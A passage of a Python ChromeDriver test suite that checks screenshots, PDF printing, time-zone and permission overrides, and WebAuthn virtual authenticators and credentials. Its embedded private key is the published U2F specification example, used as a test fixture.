pixels[i + 2] != 0) { // Blue const message = ( 'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') + ') at offset ' + i + ' from ' + image.src); // "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect // pixel. Since no later Mac version, nor any other platform, // exhibits this problem, we assume this is due to a bug in this // specific version of Mac OS. So, just log the error and pass // the test. http://crbug.com/913603 if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) { console.error(message); console.error('Passing test due to Mac 10.10-specific bug.'); resolve('PASS'); } else { resolve(message); } return; } } resolve('PASS'); }; image.src = 'data:image/png;base64,%s'; """ % png_data_in_base64.replace("'", "\\'")) def takeScreenshotAndVerifyCorrect(self, element): """ Takes screenshot of given element and returns 'PASS' if all pixels in screenshot are rgb(255, 0, 0) and 'FAIL' otherwise """ elementScreenshotPNGBase64 = element.TakeElementScreenshot() self.assertIsNotNone(elementScreenshotPNGBase64) return self._driver.ExecuteAsyncScript( ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64)) def testTakeElementScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_redbox.html')) # Wait for page to stabilize in case of Chrome showing top bars. # See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeElementScreenshotPartlyVisible(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_redbox_partly_visible.html')) self._driver.SetWindowRect(500, 500, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeElementScreenshotInIframe(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_iframe_redbox.html')) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) # Wait for page to stabilize in case of Chrome showing top bars. # See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeLargeElementScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) self._driver.SetWindowRect(500, 500, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#A') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) @staticmethod def png_dimensions(png_data_in_base64): image = base64.b64decode(png_data_in_base64) width, height = struct.unpack('>LL', image[16:24]) return int(width), int(height) def testTakeLargeElementViewportScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) self._driver.SetWindowRect(640, 400, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) viewportScreenshotPNGBase64 = self._driver.TakeScreenshot() self.assertIsNotNone(viewportScreenshotPNGBase64) mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64)) self.assertEqual('png', mime_type) image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64) viewport_width, viewport_height = self._driver.ExecuteScript( ''' const {devicePixelRatio, innerHeight, innerWidth} = window; return [ Math.floor(innerWidth * devicePixelRatio), Math.floor(innerHeight * devicePixelRatio) ]; ''') self.assertEquals(image_width, viewport_width) self.assertEquals(image_height, viewport_height) def testTakeLargeElementFullPageScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) width = 640 height = 400 self._driver.SetWindowRect(width, height, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot() self.assertIsNotNone(fullpageScreenshotPNGBase64) mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64)) self.assertEqual('png', mime_type) image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64) # According to https://javascript.info/size-and-scroll-window, # width/height of the whole document, with the scrolled out part page_width, page_height = self._driver.ExecuteScript( ''' const body = document.body; const doc = document.documentElement; const width = Math.max(body.scrollWidth, body.offsetWidth,\ body.clientWidth, doc.scrollWidth,\ doc.offsetWidth, doc.clientWidth); const height = Math.max(body.scrollHeight, body.offsetHeight,\ body.clientHeight, doc.scrollHeight,\ doc.offsetHeight, doc.clientHeight); return [ width, height ]; ''') self.assertEquals(image_width, page_width) self.assertEquals(image_height, page_height) # Assert Window Rect size stay the same after taking fullpage screenshot size = self._driver.GetWindowRect() self.assertEquals(size[0], width) self.assertEquals(size[1], height) # Verify scroll bars presence after test horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript( ''' const doc = document.documentElement; return [ doc.scrollWidth > doc.clientWidth, doc.scrollHeight > doc.clientHeight ]; ''') self.assertEquals(horizontal_scroll_bar, True) self.assertEquals(vertical_scroll_bar, True) def testPrint(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgument(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) def testGenerateTestReport(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/reporting_observer.html')) self._driver.GenerateTestReport('test report message'); report = self._driver.ExecuteScript('return window.result;') self.assertEquals('test', report['type']); self.assertEquals('test report message', report['body']['message']); def testSetTimeZone(self): defaultTimeZoneScript = ''' return (new Intl.DateTimeFormat()).resolvedOptions().timeZone; '''; localHourScript = ''' return (new Date("2020-10-10T00:00:00Z")).getHours(); '''; self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) # Test to switch to Taipei self._driver.SetTimeZone('Asia/Taipei'); timeZone = self._driver.ExecuteScript(defaultTimeZoneScript) self.assertEquals('Asia/Taipei', timeZone); localHour = self._driver.ExecuteScript(localHourScript) # Taipei time is GMT+8. Not observes DST. self.assertEquals(8, localHour); # Test to switch to Tokyo self._driver.SetTimeZone('Asia/Tokyo'); timeZone = self._driver.ExecuteScript(defaultTimeZoneScript) self.assertEquals('Asia/Tokyo', timeZone); localHour = self._driver.ExecuteScript(localHourScript) # Tokyo time is GMT+9. Not observes DST. self.assertEquals(9, localHour); def GetPermissionWithQuery(self, query): script = """ let query = arguments[0]; let done = arguments[1]; console.log(done); navigator.permissions.query(query) .then(function(value) { done({ status: 'success', value: value && value.state }); }, function(error) { done({ status: 'error', value: error && error.message }); }); """ return self._driver.ExecuteAsyncScript(script, query) def GetPermission(self, name): return self.GetPermissionWithQuery({ 'name': name }) def CheckPermission(self, response, expected_state): self.assertEquals(response['status'], 'success') self.assertEquals(response['value'], expected_state) def testPermissionsOpaqueOriginsThrowError(self): """ Confirms that opaque origins cannot have overrides. """ self._driver.Load("about:blank") self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, {'descriptor': { 'name': 'geolocation' }, 'state': 'denied'}) def testPermissionStates(self): """ Confirms that denied, granted, and prompt can be set. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' }) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') def testSettingPermissionDoesNotAffectOthers(self): """ Confirm permissions do not affect unset permissions. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) response = self.GetPermission('geolocation') self.assertEquals(response['status'], 'success') status = response['value'] self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('background-sync'), 'denied') self.CheckPermission(self.GetPermission('geolocation'), status) def testMultiplePermissions(self): """ Confirms multiple custom permissions can be set simultaneously. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-fetch' }, 'state': 'prompt' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self.CheckPermission(self.GetPermission('background-fetch'), 'prompt') self.CheckPermission(self.GetPermission('background-sync'), 'granted') def testSensorPermissions(self): """ Tests sensor permissions. Currently, Chrome controls all sensor permissions (accelerometer, magnetometer, gyroscope, ambient-light-sensor) with the 'sensors' permission. This test demonstrates this internal implementation detail so developers are aware of this behavior. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'magnetometer' }, 'state': 'granted' } self._driver.SetPermission(parameters) # Light sensor is not enabled by default, so it cannot be queried or set. #self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'granted') self.CheckPermission(self.GetPermission('magnetometer'), 'granted') self.CheckPermission(self.GetPermission('accelerometer'), 'granted') self.CheckPermission(self.GetPermission('gyroscope'), 'granted') parameters = { 'descriptor': { 'name': 'gyroscope' }, 'state': 'denied' } self._driver.SetPermission(parameters) #self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'denied') self.CheckPermission(self.GetPermission('magnetometer'), 'denied') self.CheckPermission(self.GetPermission('accelerometer'), 'denied') self.CheckPermission(self.GetPermission('gyroscope'), 'denied') def testMidiPermissions(self): """ Tests midi permission requirements. MIDI, sysex: true, when granted, should automatically grant regular MIDI permissions. When regular MIDI is denied, this should also imply MIDI with sysex is denied. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'midi', 'sysex': True }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['sysex'] = False self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'midi', 'sysex': False }, 'state': 'denied' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'denied') # While this should be denied, Chrome does not do this. # parameters['descriptor']['sysex'] = True should be denied. def testClipboardPermissions(self): """ Tests clipboard permission requirements. clipboard-read with allowWithoutSanitization: true or false, and clipboard-write with allowWithoutSanitization: true are bundled together into one CLIPBOARD_READ_WRITE permission. clipboard write with allowWithoutSanitization: false is an auto-granted permission. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'clipboard-read' , 'allowWithoutSanitization': False }, 'state': 'granted' } raw_write_parameters = { 'descriptor': { 'name': 'clipboard-write', 'allowWithoutSanitization': True } } self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'prompt') self.CheckPermission(self.GetPermissionWithQuery( raw_write_parameters['descriptor']), 'prompt') self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['allowWithoutSanitization'] = True self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['name'] = 'clipboard-write' self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'clipboard-write' }, 'state': 'prompt' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('clipboard-read'), 'granted') self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt') def testPersistentStoragePermissions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'persistent-storage' }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'denied') def testPushAndNotificationsPermissions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'notifications' }, 'state': 'granted' } push_descriptor = { 'name': 'push', 'userVisibleOnly': True } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'granted') self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'denied') self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'denied') push_descriptor['userVisibleOnly'] = False parameters = { 'descriptor': push_descriptor, 'state': 'prompt' } self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, parameters) def testPermissionsSameOrigin(self): """ Assures permissions are shared between same-domain windows. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'granted') def testNewWindowSameDomainHasSamePermissions(self): """ Assures permissions are shared between same-domain windows, even when window is created after permissions are set. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') same_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(same_domain) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) self.CheckPermission(self.GetPermission('geolocation'), 'denied') def testPermissionsSameOriginDoesNotAffectOthers(self): """ Tests whether permissions set between two domains affect others. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) different_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(different_domain) self._driver.Load('https://google.com') self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'}, 'state': 'denied' }) # Switch for permissions. self._driver.SwitchToWindow(another_window_handle) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') # Assert different domain is not the same. self._driver.SwitchToWindow(different_domain) self.CheckPermission(self.GetPermission('geolocation'), 'denied') # Tests that the webauthn capabilities are true on desktop and false on # android. def testWebauthnVirtualAuthenticatorsCapability(self): is_desktop = _ANDROID_PACKAGE_KEY is None self.assertEqual( is_desktop, self._driver.capabilities['webauthn:virtualAuthenticators']) self.assertEqual( is_desktop, self._driver.capabilities['webauthn:extension:largeBlob']) def testCanClickInIframesInShadow(self): """Test that you can interact with a iframe within a shadow element. See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445 """ self._driver.SetTimeouts({'implicit': 2000}) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_iframe.html')) frame = self._driver.ExecuteScript( '''return document.querySelector("#shadow") .shadowRoot.querySelector("iframe")''') self._driver.SwitchToFrame(frame) message = self._driver.FindElement('css selector', '#message') self.assertTrue('clicked' not in message.GetText()) button = self._driver.FindElement('tag name', 'button') button.Click() message = self._driver.FindElement('css selector', '#message.result') self.assertTrue('clicked' in message.GetText()) def testCanClickInIframesInShadowScrolled(self): """Test that you can interact with a scrolled iframe within a scrolled shadow element. See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445 """ self._driver.SetTimeouts({'implicit': 2000}) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_iframe.html')) frame = self._driver.ExecuteScript( '''return document.querySelector("#shadow_scroll") .shadowRoot.querySelector("iframe")''') self._driver.SwitchToFrame(frame) message = self._driver.FindElement('css selector', '#message') self.assertTrue('clicked' not in message.GetText()) button = self._driver.FindElement('tag name', 'button') button.Click() message = self._driver.FindElement('css selector', '#message.result') self.assertTrue('clicked' in message.GetText()) class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer): def setUp(self): self._driver1 = self.CreateDriver() self._driver2 = self.CreateDriver() def testBackgroundScreenshot(self): self._driver2.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') self._driver1.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') screenshotPNGBase64 = self._driver1.TakeScreenshot() self.assertIsNotNone(screenshotPNGBase64) # Tests that require a secure context. class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer): # The example attestation private key from the U2F spec at # https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example # PKCS.8 encoded without encryption, as a base64url string. privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q" "hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU" "RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB") @staticmethod def GetHttpsUrlForFile(file_path, host=None): return ChromeDriverSecureContextTest._https_server.GetUrl( host) + file_path # Encodes a string in URL-safe base64 with no padding. @staticmethod def URLSafeBase64Encode(string): encoded = base64.urlsafe_b64encode(string) while encoded[-1] == "=": encoded = encoded[0:-1] return encoded # Decodes a base64 string with no padding. @staticmethod def UrlSafeBase64Decode(string): string = string.encode("utf-8") if len(string) % 4 != 0: string += "=" * (4 - len(string) % 4) return base64.urlsafe_b64decode(string) def setUp(self): self._driver = self.CreateDriver( accept_insecure_certs=True, chrome_switches=['host-resolver-rules=MAP * 127.0.0.1', 'enable-experimental-web-platform-features']) def testAddVirtualAuthenticator(self): script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { requireResidentKey: true, }, extensions: { largeBlob: { support: 'preferred', }, }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserConsenting = True, isUserVerified = True, extensions = ['largeBlob'] ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(['usb'], result['credential']['transports']) self.assertEquals(True, result['extensions']['largeBlob']['supported']) def testAddVirtualAuthenticatorProtocolVersion(self): self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']: authenticator_id = self._driver.AddVirtualAuthenticator( protocol = protocol, transport = 'usb', ) self.assertTrue(len(authenticator_id) > 0) self.assertRaisesRegexp( chromedriver.UnsupportedOperation, 'INVALID is not a recognized protocol version', self._driver.AddVirtualAuthenticator, protocol = 'INVALID', transport = 'usb') def testAddVirtualBadExtensions(self): self.assertRaisesRegexp( chromedriver.InvalidArgument, 'extensions must be a list of strings', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = 'invalid') self.assertRaisesRegexp( chromedriver.InvalidArgument, 'extensions must be a list of strings', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = [42]) self.assertRaisesRegexp( chromedriver.UnsupportedOperation, 'smolBlowbs is not a recognized extension', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = ['smolBlowbs']) def testAddVirtualAuthenticatorDefaultParams(self): script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) self._driver.AddVirtualAuthenticator( protocol = 'ctap1/u2f', transport = 'usb', ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(['usb'], result['credential']['transports']) def testRemoveVirtualAuthenticator(self): self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) # Removing a non existent virtual authenticator should fail. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'Could not find a Virtual Authenticator matching the ID', self._driver.RemoveVirtualAuthenticator, 'id') # Create an authenticator and try removing it. authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) self._driver.RemoveVirtualAuthenticator(authenticatorId) # Trying to remove the same authenticator should fail. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'Could not find a Virtual Authenticator matching the ID', self._driver.RemoveVirtualAuthenticator, authenticatorId) def testAddCredential(self): script = """ let done = arguments[0]; getCredential({ type: "public-key", id: new TextEncoder().encode("cred-1"), transports: ["usb"], }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) # Register a credential and try authenticating with it. self._driver.AddCredential( authenticatorId = authenticatorId, credentialId = self.URLSafeBase64Encode("cred-1"), isResidentCredential=False, rpId="chromedriver.test", privateKey=self.privateKey, signCount=1, ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) def testAddCredentialLargeBlob(self): script = """ let done = arguments[0]; getCredential({ type: "public-key", id: new TextEncoder().encode("cred-1"), transports: ["usb"], }, { extensions: { largeBlob: { read: true, }, }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserVerified = True, extensions = ['largeBlob'] ) # Register a credential with a large blob and try reading it. self._driver.AddCredential( authenticatorId = authenticatorId, credentialId = self.URLSafeBase64Encode('cred-1'), userHandle = self.URLSafeBase64Encode('erina'), largeBlob = self.URLSafeBase64Encode('large blob contents'), isResidentCredential = True, rpId = "chromedriver.test", privateKey = self.privateKey, signCount = 1, ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals('large blob contents', result['blob']) def testAddCredentialBase64Errors(self): # Test that AddCredential checks UrlBase64 parameteres. self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) # Try adding a credentialId that is encoded in vanilla base64. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'credentialId must be a base64url encoded string', self._driver.AddCredential, authenticatorId, '_0n+wWqg=', False, "chromedriver.test", self.privateKey, None, 1, ) # Try adding a credentialId that is not a string. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'credentialId must be a base64url encoded string', self._driver.AddCredential, authenticatorId, 1, False, "chromedriver.test", self.privateKey, None, 1, ) def testGetCredentials(self): script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { requireResidentKey: true, }, extensions: { largeBlob: { support: "required", }, }, }).then(attestation => getCredential({ type: "public-key", id: Uint8Array.from(attestation.credential.rawId), transports: ["usb"], }, { extensions: { largeBlob: { write: new TextEncoder().encode("large blob contents"), }, }, })).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserVerified = True, extensions = ['largeBlob'] ) # Register a credential via the webauthn API and set a large blob on it. result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(True, result['extensions']['largeBlob']['written']) credentialId = result['attestation']['id'] # GetCredentials should return the credential that was just created. credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(1, len(credentials)) self.assertEquals(credentialId, credentials[0]['credentialId']) self.assertEquals(True, credentials[0]['isResidentCredential']) self.assertEquals('chromedriver.test', credentials[0]['rpId']) self.assertEquals(chr(1), self.UrlSafeBase64Decode(credentials[0]['userHandle'])) self.assertEquals(2, credentials[0]['signCount']) self.assertTrue(credentials[0]['privateKey']) self.assertEquals('large blob contents', self.UrlSafeBase64Decode(credentials[0]['largeBlob'])) def testRemoveCredential(self): script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', ) # Register two credentials. result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) credential1Id = result['credential']['id'] result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) credential2Id = result['credential']['id'] # GetCredentials should return both credentials. credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(2, len(credentials)) # Removing the first credential should leave only the first one. self._driver.RemoveCredential(authenticatorId, credential1Id) credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(1, len(credentials)) self.assertEquals(credential2Id, credentials[0]['credentialId']) def testRemoveAllCredentials(self): register_credential_script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', ) # Register a credential via the webauthn API. result = self._driver.ExecuteAsyncScript(register_credential_script) self.assertEquals('OK', result['status']) credentialId = result['credential']['rawId'] # Attempting to register with the credential ID on excludeCredentials should # fail. exclude_credentials_script = """ let done = arguments[0]; registerCredential({ excludeCredentials: [{ type: "public-key", id: Uint8Array.from(%s), transports: ["usb"], }], }).then(done); """ % (credentialId) result = self._driver.ExecuteAsyncScript(exclude_credentials_script) self.assertEquals("InvalidStateError: The user attempted to register an " "authenticator that contains one of the credentials " "already registered with the relying party.", result['status']) # The registration should succeed after clearing the credentials. self._driver.RemoveAllCredentials(authenticatorId) result = self._driver.ExecuteAsyncScript(exclude_credentials_script) self.assertEquals('OK', result['status']) def testSetUserVerified(self): register_uv_script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { userVerification: "required", }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = True, hasUserVerification = True, ) # Configure the virtual authenticator to fail user verification. self._driver.SetUserVerified(authenticatorId, False) # Attempting to register a credential with UV required should fail. result = self._driver.ExecuteAsyncScript(register_uv_script) self.assertTrue(result['status'].startswith("NotAllowedError"), "Expected %s to be a NotAllowedError" % (result['status'])) # Trying again after setting userVerified to True should succeed. self._driver.SetUserVerified(authenticatorId, True) result = self._driver.ExecuteAsyncScript(register_uv_script) self.assertEquals("OK", result['status']) # Tests in the following class are expected to be moved to ChromeDriverTest # class when we no longer support the legacy mode. class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer): """W3C mode specific tests.""" def setUp(self): self._driver = self.CreateDriver( send_w3c_capability=True, send_w3c_request=True) def testSendKeysToElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testSendKeysToElementDoesNotAppend(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) textControlTypes = ["text", "search", "tel", "url", "password"] for textType in textControlTypes: element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<input type="{}" value="send_this_value">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.focus();' 'input.setSelectionRange(0,0);' 'return input;'.format(textType)) element.SendKeys('hello') value = self._driver.ExecuteScript('return arguments[0].value;', element) self.assertEquals('hellosend_this_value', value) def testSendKeysToEditableElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello-></i> ' '<b>send_this_value </b> </p>\';' 'var input = document.getElementsByTagName("i")[0];' 'return input;') element.SendKeys('hello') self.assertEquals(u'hello->hello', element.GetText()) 